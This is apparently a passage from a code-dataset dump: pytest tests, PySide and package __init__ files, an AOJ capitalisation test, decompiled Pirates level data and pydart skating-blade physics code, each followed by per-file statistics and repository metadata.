success."""
test_attributes_inductor["subcategory_id"] = 1
test_attributes_inductor["construction_id"] = 1
test_attributes_inductor["power_operating"] = 0.0
test_attributes_inductor["voltage_dc_operating"] = 0.0
test_attributes_inductor["area"] = 0.0
test_attributes_inductor["weight"] = 0.0
_attributes = inductor.calculate_part_stress(**test_attributes_inductor)
assert isinstance(_attributes, dict)
assert _attributes["temperature_rise"] == 0.0
assert _attributes["lambda_b"] == pytest.approx(0.0024147842)
assert _attributes["piC"] == 1.0
assert _attributes["hazard_rate_active"] == pytest.approx(0.01811088)
@pytest.mark.unit
def test_set_default_max_rated_temperature():
"""should return the default capacitance for the selected subcategory ID."""
assert inductor._set_default_max_rated_temperature(1) == 130.0
assert inductor._set_default_max_rated_temperature(2) == 125.0
@pytest.mark.unit
def test_set_default_temperature_rise():
"""should return the default capacitance for the selected subcategory ID."""
assert inductor._set_default_temperature_rise(1, 1) == 10.0
assert inductor._set_default_temperature_rise(1, 3) == 30.0
assert inductor._set_default_temperature_rise(2, 1) == 10.0
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_set_default_values(test_attributes_inductor):
"""should set default values for each parameter <= 0.0."""
test_attributes_inductor["rated_temperature_max"] = 0.0
test_attributes_inductor["temperature_rise"] = 0.0
test_attributes_inductor["subcategory_id"] = 1
_attributes = inductor.set_default_values(**test_attributes_inductor)
assert isinstance(_attributes, dict)
assert _attributes["rated_temperature_max"] == 130.0
assert _attributes["temperature_rise"] == 10.0
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_set_default_values_none_needed(test_attributes_inductor):
"""should not set default values for each parameter > 0.0."""
test_attributes_inductor["rated_temperature_max"] = 135.0
test_attributes_inductor["temperature_rise"] = 5.0
test_attributes_inductor["subcategory_id"] = 1
_attributes = inductor.set_default_values(**test_attributes_inductor)
assert isinstance(_attributes, dict)
assert _attributes["rated_temperature_max"] == 135.0
assert _attributes["temperature_rise"] == 5.0
| 30.707165
| 88
| 0.608248
| 2,394
| 19,714
| 4.691729
| 0.095238
| 0.123397
| 0.137108
| 0.024217
| 0.887464
| 0.861734
| 0.820335
| 0.755876
| 0.7362
| 0.718572
| 0
| 0.083459
| 0.291925
| 19,714
| 641
| 89
| 30.75507
| 0.721183
| 0.148524
| 0
| 0.726166
| 0
| 0
| 0.072319
| 0.027233
| 0
| 0
| 0
| 0
| 0.117647
| 1
| 0.060852
| false
| 0
| 0.004057
| 0
| 0.064909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da299d46fb201cac14d730a8d25fa58400725b4e
| 176
|
py
|
Python
|
ui/__init__.py
|
magnusjwatson2786/Container-GUI
|
42cbe1bb970fbabe5b5fde873425f262e9207d30
|
[
"MIT"
] | null | null | null |
ui/__init__.py
|
magnusjwatson2786/Container-GUI
|
42cbe1bb970fbabe5b5fde873425f262e9207d30
|
[
"MIT"
] | null | null | null |
ui/__init__.py
|
magnusjwatson2786/Container-GUI
|
42cbe1bb970fbabe5b5fde873425f262e9207d30
|
[
"MIT"
] | null | null | null |
from PySide6.QtCore import *
from PySide6.QtGui import *
from PySide6.QtWidgets import *
from . ui_q3y import Ui_MainWindow
from . config import Config
from . fxns import *
| 17.6
| 34
| 0.772727
| 25
| 176
| 5.36
| 0.44
| 0.246269
| 0.253731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027397
| 0.170455
| 176
| 9
| 35
| 19.555556
| 0.890411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e5055ada1e64560a8a368105e2019840ede5abf9
| 51
|
py
|
Python
|
mulpro/__init__.py
|
Toonggg/mulpro
|
a341d371990e9550cf6df028871c17a82e764943
|
[
"BSD-2-Clause"
] | null | null | null |
mulpro/__init__.py
|
Toonggg/mulpro
|
a341d371990e9550cf6df028871c17a82e764943
|
[
"BSD-2-Clause"
] | null | null | null |
mulpro/__init__.py
|
Toonggg/mulpro
|
a341d371990e9550cf6df028871c17a82e764943
|
[
"BSD-2-Clause"
] | null | null | null |
from mulpro import mulpro, log
#import mulpro, log
| 25.5
| 30
| 0.784314
| 8
| 51
| 5
| 0.5
| 0.6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156863
| 51
| 2
| 31
| 25.5
| 0.930233
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e51915da24d302cda8208289c3415add74ac5e0e
| 3,289
|
py
|
Python
|
tests/AOJ/test_ITP1_8_A.py
|
nabetama-training/CompetitionProgrammingPractice
|
0801173df3992c2e78b02b383f2df9ba792cbf2f
|
[
"BSD-2-Clause"
] | null | null | null |
tests/AOJ/test_ITP1_8_A.py
|
nabetama-training/CompetitionProgrammingPractice
|
0801173df3992c2e78b02b383f2df9ba792cbf2f
|
[
"BSD-2-Clause"
] | 2
|
2020-07-04T04:19:28.000Z
|
2020-07-26T06:16:07.000Z
|
tests/AOJ/test_ITP1_8_A.py
|
nabetama-training/CompetitionProgrammingPractice
|
0801173df3992c2e78b02b383f2df9ba792cbf2f
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
from io import StringIO
import unittest
from src.AOJ.ITP1_8_A import resolve
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_1(self):
input = """fAIR, LATER, OCCASIONALLY CLOUDY.
"""
output = """Fair, later, occasionally cloudy.
"""
self.assertIO(input, output)
def test_2(self):
input = """a
"""
output = """A
"""
self.assertIO(input, output)
def test_3(self):
input = """s1061159 m5061126 d8061103
"""
output = """S1061159 M5061126 D8061103
"""
self.assertIO(input, output)
def test_4(self):
input = """tHE uNIVERSITY OF aIZU TEAM VISITED gOVERNOR sATO AT THE fUKUSHIMA pREFECTURAL oFFICE ON mAY 26 TO REPORT THE RESULT OF THEIR FIRST PARTICIPATION AT THE acm-icpc wORLD fINALS (aPRIL 2009, sWEDEN). cOACH yUTAKA wATANOBE AND 2 CONTESTANTS, mR. tAKASHI tAYAMA AND mR. yUKI hIRANO, VISITED THE gOVERNOR ACCOMPANYING WITH vICE pRESIDENT nICOLAY mIRENKOV, WHO MADE AN INTRODUCTION OF THE TEAM TO THE gOVERNOR. cOACH wATANOBE EXPLAINED THE ATMOSPHERE OF THE CONTEST AND THE TEAM'S PERFORMANCE USING PICTURES AND DOCUMENTS HE BROUGHT. tHE TEAM RECEIVED A COMPLIMENT FROM THE gOVERNOR SHOWING HIS GRATITUDE TO THE TEAM FOR PROVING THE uNIVERSITY THROUGH THE CONTEST COMPETING WITH OTHER WORLD-RENOWNED UNIVERSITIES. tHE gOVERNOR ALSO EXPRESSED HIS HIGH EXPECTATION TO THE TEAM TO MAKE FURTHER ACHIEVEMENT IN THE FUTURE. tHE TEAM WAS ENCOURAGED BY HIS WORDS AND REAFFIRMED THEIR DETERMINATION TO PASS THE PRELIMINARY ROUND WITHIN jAPAN IN jULY AND THE aSIA rEGIONALS IN nOVEMBER TO GO TO THE fINALS AGAIN. bEFORE THE VISIT TO THE gOVERNOR, THE TEAM ALSO MET vICE gOVERNOR mATSUMOTO AND vICE gOVERNOR uCHIBORI, AND THEY COMMENDED THE TEAM FOR THE ACHIEVEMENT.
"""
output = """The University of Aizu team visited Governor Sato at the Fukushima Prefectural Office on May 26 to report the result of their first participation at the ACM-ICPC World Finals (April 2009, Sweden). Coach Yutaka Watanobe and 2 contestants, Mr. Takashi Tayama and Mr. Yuki Hirano, visited the Governor accompanying with Vice President Nicolay Mirenkov, who made an introduction of the team to the Governor. Coach Watanobe explained the atmosphere of the contest and the team's performance using pictures and documents he brought. The team received a compliment from the Governor showing his gratitude to the team for proving the University through the contest competing with other world-renowned universities. The Governor also expressed his high expectation to the team to make further achievement in the future. The team was encouraged by his words and reaffirmed their determination to pass the preliminary round within Japan in July and the Asia Regionals in November to go to the Finals again. Before the visit to the Governor, the team also met Vice Governor Matsumoto and Vice Governor Uchibori, and they commended the team for the achievement.
"""
self.assertIO(input, output)
| 71.5
| 1,168
| 0.751292
| 483
| 3,289
| 5.10352
| 0.293996
| 0.045436
| 0.021095
| 0.037323
| 0.82069
| 0.804868
| 0.768357
| 0.768357
| 0.768357
| 0.768357
| 0
| 0.023783
| 0.194588
| 3,289
| 45
| 1,169
| 73.088889
| 0.906757
| 0
| 0
| 0.324324
| 0
| 0.054054
| 0.737226
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 1
| 0.135135
| false
| 0.054054
| 0.108108
| 0
| 0.27027
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
e53f3a98417fcd36a43864537d2c2c0d52f38321
| 63
|
py
|
Python
|
package1/package2/__main__.py
|
leowindwave/YAPT
|
ee5ec568ed746f90a18dc514836624d435a7ccdb
|
[
"CC0-1.0"
] | 4
|
2017-03-06T09:49:11.000Z
|
2019-10-16T00:09:38.000Z
|
package1/package2/__main__.py
|
leowindwave/YAPT
|
ee5ec568ed746f90a18dc514836624d435a7ccdb
|
[
"CC0-1.0"
] | null | null | null |
package1/package2/__main__.py
|
leowindwave/YAPT
|
ee5ec568ed746f90a18dc514836624d435a7ccdb
|
[
"CC0-1.0"
] | 7
|
2017-11-02T11:00:30.000Z
|
2020-01-31T22:41:27.000Z
|
print("package1/package2/__main__.py executed")
import module2
| 21
| 47
| 0.825397
| 8
| 63
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 0.063492
| 63
| 2
| 48
| 31.5
| 0.762712
| 0
| 0
| 0
| 0
| 0
| 0.603175
| 0.460317
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
e552822ef5bb86eb7bd71b441f46a649f3542bcb
| 8,840
|
py
|
Python
|
pirates/leveleditor/worldData/pvpShipIsland1_int_tavern.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 3
|
2021-02-25T06:38:13.000Z
|
2022-03-22T07:00:15.000Z
|
pirates/leveleditor/worldData/pvpShipIsland1_int_tavern.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | null | null | null |
pirates/leveleditor/worldData/pvpShipIsland1_int_tavern.py
|
itsyaboyrocket/pirates
|
6ca1e7d571c670b0d976f65e608235707b5737e3
|
[
"BSD-3-Clause"
] | 1
|
2021-02-25T06:38:17.000Z
|
2021-02-25T06:38:17.000Z
|
# uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.pvpShipIsland1_int_tavern
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1202846053.19akelts0': {'Type': 'Building Interior', 'Name': '', 'AdditionalData': ['interior_tavern_b'], 'Instanced': False, 'Objects': {'1204236104.67akelts': {'Type': 'Door Locator Node', 'Name': 'door_locator', 'Hpr': VBase3(-179.829, 0.0, 0.0), 'Pos': Point3(-0.498, -4.914, 0.952), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1204236104.69akelts': {'Type': 'Door Locator Node', 'Name': 'door_locator_2', 'Hpr': VBase3(0.0, 0.0, 0.0), 'Pos': Point3(-6.626, 20.947, 1.006), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1208543385.0akelts': {'Type': 'Wall_Hangings', 'DisableCollision': False, 'Hpr': VBase3(8.288, 0.0, 0.0), 'Pos': Point3(0.577, 44.618, 16.331), 'Scale': VBase3(1.207, 1.207, 1.207), 'Visual': {'Color': (0.5, 0.45, 0.45, 1.0), 'Model': 'models/props/flag_hanging_french'}}, '1208543583.91akelts': {'Type': 'Townsperson', 'Category': 'Bartender', 'AnimSet': 'sweep', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'HelpID': 'NONE', 'Holiday': '', 'Hpr': VBase3(-97.978, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(-49.928, 12.507, 1.127), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': True, 'Scale': VBase3(0.999, 0.999, 0.999), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208544322.67akelts': {'Type': 'Townsperson', 'Category': 'Commoner', 'AnimSet': 'sit_sleep', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'HelpID': 'NONE', 'Holiday': '', 'Hpr': VBase3(80.877, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(-1.29, 23.625, 1.0), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': True, 'Scale': VBase3(1.0, 1.0, 1.0), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208544716.73akelts': {'Type': 'Townsperson', 'Category': 'Commoner', 'AnimSet': 'bar_talk01', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'Hpr': VBase3(-12.421, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(-45.095, -10.344, 1.0), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': True, 'Scale': VBase3(0.943, 0.943, 0.943), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208545146.78akelts': {'Type': 'Townsperson', 'Category': 'Commoner', 'AnimSet': 'bar_talk03', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'Hpr': VBase3(-143.742, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(-45.371, -5.222, 1.0), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': True, 'Scale': VBase3(0.99, 0.99, 0.99), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208546953.92akelts': {'Type': 'Townsperson', 'Category': 'Commoner', 'AnimSet': 'idleC', 'AuraFX': 'None', 'Boss': False, 'CustomModel': 'None', 'GhostColor': 'None', 'GhostFX': 0, 'Greeting Animation': '', 'Hpr': VBase3(74.008, 0.0, 0.0), 'Instanced World': 'None', 'Level': '37', 'Notice Animation 1': '', 'Notice Animation 2': '', 'Patrol Radius': '12.0000', 'Pos': Point3(18.561, -3.343, 1.0), 'PoseAnim': '', 'PoseFrame': '', 'Private Status': 'All', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Respawns': True, 'Scale': VBase3(1.0, 1.0, 1.0), 'ShopID': 'PORT_ROYAL_DEFAULTS', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'Villager', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'Zombie': False, 'spawnTimeAlt': '', 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1208550439.95akelts': {'Type': 'Cups', 'DisableCollision': False, 'Hpr': VBase3(-120.43, 0.0, 0.0), 'Pos': Point3(-47.074, -7.149, 4.608), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0), 'Model': 'models/props/beerstein'}}, '1209147627.03akelts': {'Type': 'Parlor Game', 'Category': 'Blackjack', 'BetMultiplier': '1', 'GameVariation': 'Normal', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-8.524, 2.247, 1.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/table_bar_round_parlor'}}}, 'Visual': {'Model': 'models/buildings/interior_tavern_b'}}}, 'Node Links': [], 'Layers': {'Collisions': ['1184008208.59kmuller', '1184016064.62kmuller', '1184013852.84kmuller', '1185822696.06kmuller', '1184006140.32kmuller', '1184002350.98kmuller', '1184007573.29kmuller', '1184021176.59kmuller', '1184005963.59kmuller', '1188324241.31akelts', '1184006537.34kmuller', '1184006605.81kmuller', '1187139568.33kmuller', '1188324186.98akelts', '1184006730.66kmuller', '1184007538.51kmuller', '1184006188.41kmuller', '1184021084.27kmuller', '1185824396.94kmuller', '1185824250.16kmuller', '1185823630.52kmuller', '1185823760.23kmuller', '1185824497.83kmuller', '1185824751.45kmuller', '1187739103.34akelts', '1188323993.34akelts', '1184016538.29kmuller', '1185822200.97kmuller', '1184016225.99kmuller', '1195241421.34akelts', '1195242796.08akelts', '1184020642.13kmuller', '1195237994.63akelts', '1184020756.88kmuller', '1184020833.4kmuller', '1185820992.97kmuller', '1185821053.83kmuller', '1184015068.54kmuller', '1184014935.82kmuller', '1185821432.88kmuller', '1185821701.86kmuller', '1195240137.55akelts', '1195241539.38akelts', '1195238422.3akelts', '1195238473.22akelts', '1185821453.17kmuller', '1184021269.96kmuller', '1185821310.89kmuller', '1185821165.59kmuller', '1185821199.36kmuller', '1185822035.98kmuller', '1184015806.59kmuller', '1185822059.48kmuller', '1185920461.76kmuller', '1194984449.66akelts', '1185824206.22kmuller', '1184003446.23kmuller', '1184003254.85kmuller', '1184003218.74kmuller', '1184002700.44kmuller', '1186705073.11kmuller', '1187658531.86akelts', '1186705214.3kmuller', '1185824927.28kmuller', '1184014204.54kmuller', '1184014152.84kmuller']}, 'ObjectIds': {'1202846053.19akelts0': '["Objects"]["1202846053.19akelts0"]', '1204236104.67akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1204236104.67akelts"]', '1204236104.69akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1204236104.69akelts"]', '1208543385.0akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208543385.0akelts"]', '1208543583.91akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208543583.91akelts"]', '1208544322.67akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208544322.67akelts"]', '1208544716.73akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208544716.73akelts"]', '1208545146.78akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208545146.78akelts"]', '1208546953.92akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208546953.92akelts"]', '1208550439.95akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1208550439.95akelts"]', '1209147627.03akelts': '["Objects"]["1202846053.19akelts0"]["Objects"]["1209147627.03akelts"]'}}
extraInfo = {'camPos': Point3(96.3424, -205.988, 41.641), 'camHpr': VBase3(26.9442, -19.9935, 0), 'focalLength': 1.39999997616, 'skyState': -1, 'fog': 0}
| 1,262.857143
| 8,387
| 0.668778
| 1,028
| 8,840
| 5.723735
| 0.342412
| 0.014956
| 0.012237
| 0.009517
| 0.472128
| 0.43015
| 0.414004
| 0.397689
| 0.386812
| 0.378994
| 0
| 0.230864
| 0.08224
| 8,840
| 7
| 8,388
| 1,262.857143
| 0.494392
| 0.026131
| 0
| 0
| 0
| 0
| 0.617316
| 0.098431
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e597d7d5e596662f7668cab5715f6ef068ef8e5c
| 17,489
|
py
|
Python
|
SkateUtils/NonHolonomicWorld.py
|
snumrl/skate
|
a57ec2dc81dc2502da8886b92b870d2c8d65b838
|
[
"Apache-2.0"
] | null | null | null |
SkateUtils/NonHolonomicWorld.py
|
snumrl/skate
|
a57ec2dc81dc2502da8886b92b870d2c8d65b838
|
[
"Apache-2.0"
] | null | null | null |
SkateUtils/NonHolonomicWorld.py
|
snumrl/skate
|
a57ec2dc81dc2502da8886b92b870d2c8d65b838
|
[
"Apache-2.0"
] | null | null | null |
import pydart2 as pydart
import numpy as np
import math
from PyCommon.modules.Math import mmMath as mm
class NHWorld(pydart.World):
def __init__(self, step, skel_path=None, xmlstr=False):
self.has_nh = False
super(NHWorld, self).__init__(step, skel_path, xmlstr)
# nonholonomic constraint initial setting
_th = 5. * math.pi / 180.
skel = self.skeletons[1]
self.skeletons[0].body(0).set_friction_coeff(0.02)
self.nh0 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_right'), np.array((0.0216+0.104, -0.0216-0.027, 0.)))
self.nh1 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_right'), np.array((0.0216-0.104, -0.0216-0.027, 0.)))
self.nh2 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_left'), np.array((0.0216+0.104, -0.0216-0.027, 0.)))
self.nh3 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_left'), np.array((0.0216-0.104, -0.0216-0.027, 0.)))
self.nh1.set_violation_angle_ignore_threshold(_th)
self.nh1.set_length_for_violation_ignore(0.208)
self.nh3.set_violation_angle_ignore_threshold(_th)
self.nh3.set_length_for_violation_ignore(0.208)
self.nh0.add_to_world()
self.nh1.add_to_world()
self.nh2.add_to_world()
self.nh3.add_to_world()
self.has_nh = True
self.ground_height = 0.
def reset(self):
super(NHWorld, self).reset()
self.skeletons[0].body(0).set_friction_coeff(0.02)
if self.has_nh:
self.nh0.add_to_world()
self.nh1.add_to_world()
self.nh2.add_to_world()
self.nh3.add_to_world()
def step(self):
# nonholonomic constraint
right_blade_front_point = self.skeletons[1].body("h_blade_right").to_world((0.0216+0.104, -0.0216-0.027, 0.))
right_blade_rear_point = self.skeletons[1].body("h_blade_right").to_world((0.0216-0.104, -0.0216-0.027, 0.))
if right_blade_front_point[1] < 0.005+self.ground_height and right_blade_rear_point[1] < 0.005+self.ground_height:
self.nh0.activate(True)
self.nh1.activate(True)
self.nh0.set_joint_pos(right_blade_front_point)
self.nh0.set_projected_vector(right_blade_front_point - right_blade_rear_point)
self.nh1.set_joint_pos(right_blade_rear_point)
self.nh1.set_projected_vector(right_blade_front_point - right_blade_rear_point)
else:
self.nh0.activate(False)
self.nh1.activate(False)
left_blade_front_point = self.skeletons[1].body("h_blade_left").to_world((0.0216+0.104, -0.0216-0.027, 0.))
left_blade_rear_point = self.skeletons[1].body("h_blade_left").to_world((0.0216-0.104, -0.0216-0.027, 0.))
if left_blade_front_point[1] < 0.005 +self.ground_height and left_blade_rear_point[1] < 0.005+self.ground_height:
self.nh2.activate(True)
self.nh3.activate(True)
self.nh2.set_joint_pos(left_blade_front_point)
self.nh2.set_projected_vector(left_blade_front_point - left_blade_rear_point)
self.nh3.set_joint_pos(left_blade_rear_point)
self.nh3.set_projected_vector(left_blade_front_point - left_blade_rear_point)
else:
self.nh2.activate(False)
self.nh3.activate(False)
super(NHWorld, self).step()
class NHWorldV2(pydart.World):
def __init__(self, step, skel_path=None, xmlstr=False):
self.has_nh = False
super(NHWorldV2, self).__init__(step, skel_path, xmlstr)
# nonholonomic constraint initial setting
skel = self.skeletons[1]
self.skeletons[0].body(0).set_friction_coeff(0.02)
self.nh0 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_right'), np.array((0.0216+0.104, -0.0216-0.027, 0.)))
self.nh1 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_right'), np.array((0.0216-0.104, -0.0216-0.027, 0.)))
self.nh2 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_left'), np.array((0.0216+0.104, -0.0216-0.027, 0.)))
self.nh3 = pydart.constraints.NonHolonomicContactConstraint(skel.body('h_blade_left'), np.array((0.0216-0.104, -0.0216-0.027, 0.)))
self.nh0.add_to_world()
self.nh1.add_to_world()
self.nh2.add_to_world()
self.nh3.add_to_world()
self.has_nh = True
self.ground_height = 0.
def reset(self):
super(NHWorldV2, self).reset()
self.skeletons[0].body(0).set_friction_coeff(0.02)
if self.has_nh:
self.nh0.add_to_world()
self.nh1.add_to_world()
self.nh2.add_to_world()
self.nh3.add_to_world()
def step(self):
# nonholonomic constraint
right_blade_front_point = self.skeletons[1].body("h_blade_right").to_world((0.0216+0.104, -0.0216-0.027, 0.))
right_blade_rear_point = self.skeletons[1].body("h_blade_right").to_world((0.0216-0.104, -0.0216-0.027, 0.))
if right_blade_front_point[1] < 0.005 + self.ground_height and right_blade_rear_point[1] < 0.005+self.ground_height:
self.nh0.activate(True)
self.nh1.activate(True)
body_pos = self.skeletons[1].body('h_blade_right').to_world((0., -0.0216-0.027, 0.))
body_vec = self.skeletons[1].body('h_blade_right').to_world() - body_pos # type: np.ndarray
projected_body_vec = body_vec.copy()
projected_body_vec[1] = 0.
projected_body_vel = self.skeletons[1].body('h_blade_right').world_linear_velocity()
projected_body_vel[1] = 0.
inclined_angle = math.pi/2. - math.acos(np.dot(mm.normalize(body_vec), mm.normalize(projected_body_vec)))
#calculate inclined angle theta
# print("vel: ", self.skeletons[1].body('h_blade_right').com_linear_velocity()[1])
# print(self.time())
# if 9. < self.time() and self.time() < 9.5:
# if 8. < self.time() and self.time() < 8.5:
# radi = 1.0
# g = 9.8
# inclined_angle = math.atan(self.skeletons[1].body('h_pelvis').com_linear_velocity()[0]**2 / (radi * g) )
# print("right_angle: ", inclined_angle)
# q_temp = self.skeletons[1].q
# q_temp[self.skeletons[1].dof_indices(["j_heel_right_x"])] = inclined_angle
# self.skeletons[1].set_positions(q_temp)
# turning_angle = np.copysign(inclined_angle / 4. ,
# np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
turning_angle = np.copysign(max(inclined_angle-15./180.*math.pi, 0.)/4., np.dot(projected_body_vel, mm.cross(projected_body_vec, mm.unitY())))
R = mm.exp(mm.unitY(), turning_angle)
